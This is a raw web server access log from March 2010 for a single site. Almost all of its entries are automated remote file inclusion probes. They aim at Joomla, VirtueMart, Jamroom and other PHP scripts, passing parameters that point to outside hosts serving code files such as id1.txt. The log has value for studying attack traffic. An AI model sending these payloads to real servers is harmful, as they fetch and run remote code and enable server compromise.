58.230.162.220 - - [04/Mar/2010:04:06:49 -0800] "GET /logs/access_100222.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:06:51 -0800] "GET /logs/access_100222.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:06:52 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:06:52 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:06:52 -0800] "GET /logs/access_100213.log/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:07:00 -0800] "GET /logs/access_100222.log//components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:08:06 -0800] "GET /logs/access_100209.log/?_SERVER[DOCUMENT_ROOT]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:08:06 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:08:07 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:08:11 -0800] "GET /logs/access_100215.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:08:14 -0800] "GET /logs/access_100209.log/?_SERVER[DOCUMENT_ROOT]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:08:14 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:08:14 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:08:17 -0800] "GET /logs/access_100222.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:08:36 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:08:36 -0800] "GET /logs/access_100207.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:08:36 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:08:52 -0800] "GET /components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:08:52 -0800] "GET /logs/access_100226.log//components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:08:52 -0800] "GET /logs//components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:09:01 -0800] "GET /logs/access_100222.log//components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [04/Mar/2010:04:09:29 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [04/Mar/2010:04:09:31 -0800] "GET /logs/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [04/Mar/2010:04:09:32 -0800] "GET /logs/access_100226.log/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:04:09:40 -0800] "GET /logs/access_100224.log/pages/pageHeader.php?path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [04/Mar/2010:04:09:56 -0800] "GET /logs/access_100222.log/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:10:32 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:04:10:33 -0800] "GET /logs/home.php?index=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:04:10:33 -0800] "GET /logs/access_100218.log%20%20/home.php?index=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:04:10:33 -0800] "GET /home.php?index=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:10:34 -0800] "GET /logs/access_100204.log%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:10:34 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:10:36 -0800] "GET /logs/access_100221.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:10:57 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:10:57 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:10:57 -0800] "GET /logs/access_100204.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:11:00 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:11:00 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:11:00 -0800] "GET /logs/access_100204.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:04:11:02 -0800] "GET /logs/access_100204.log%20%20/home.php?index=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.97 - - [04/Mar/2010:04:11:18 -0800] "GET /pictures/p8 HTTP/1.0" 301 76 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [04/Mar/2010:04:11:19 -0800] "GET /pictures/p8/ HTTP/1.0" 302 11303 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [04/Mar/2010:04:11:21 -0800] "GET /login/needregister.php HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
62.140.23.24 - - [04/Mar/2010:04:11:22 -0800] "GET /logs/access_100204.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:11:22 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:11:22 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.97 - - [04/Mar/2010:04:11:22 -0800] "GET /login/registerError.php HTTP/1.0" 200 6018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [04/Mar/2010:04:11:23 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [04/Mar/2010:04:11:24 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [04/Mar/2010:04:11:25 -0800] "GET /login/dtree.css HTTP/1.0" 404 5258 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
62.140.23.24 - - [04/Mar/2010:04:12:14 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:12:14 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:12:15 -0800] "GET /logs/access_100204.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:12:26 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:12:26 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:12:26 -0800] "GET /logs/access_100204.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:12:28 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:12:28 -0800] "GET /logs/access_100204.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:12:28 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:12:30 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:12:30 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:12:30 -0800] "GET /logs/access_100204.log%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:12:32 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:12:32 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:12:32 -0800] "GET /logs/access_100204.log%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:12:58 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:12:58 -0800] "GET /logs/access_100204.log%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:12:58 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:13:01 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:13:01 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:13:01 -0800] "GET /logs/access_100204.log%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:13:46 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:13:46 -0800] "GET /logs/access_100204.log%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:13:46 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:04:14:08 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:04:14:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:04:14:08 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:14:31 -0800] "GET /logs/access_100204.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:04:14:31 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:04:14:31 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:04:14:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [04/Mar/2010:04:15:16 -0800] "GET /logs/access_100204.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:18:13 -0800] "GET /logs/access_100126.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:18:13 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:18:13 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:18:14 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:18:14 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:18:14 -0800] "GET /logs/access_100126.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:04:18:44 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:04:18:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:04:18:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:19:04 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:19:04 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:19:04 -0800] "GET /logs/access_100126.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:19:12 -0800] "GET //admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:19:12 -0800] "GET /logs///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:19:12 -0800] "GET /logs/access_100226.log///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:19:14 -0800] "GET /logs/access_100226.log///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:19:14 -0800] "GET /logs///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:19:14 -0800] "GET //admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:19:50 -0800] "GET /logs/access_100212.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:19:54 -0800] "GET //admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:19:54 -0800] "GET /logs///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:19:54 -0800] "GET /logs/access_100226.log%20%20///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:20:15 -0800] "GET /logs/access_100212.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:04:21:00 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:04:21:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:04:21:00 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:21:09 -0800] "GET /logs/access_100204.log///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
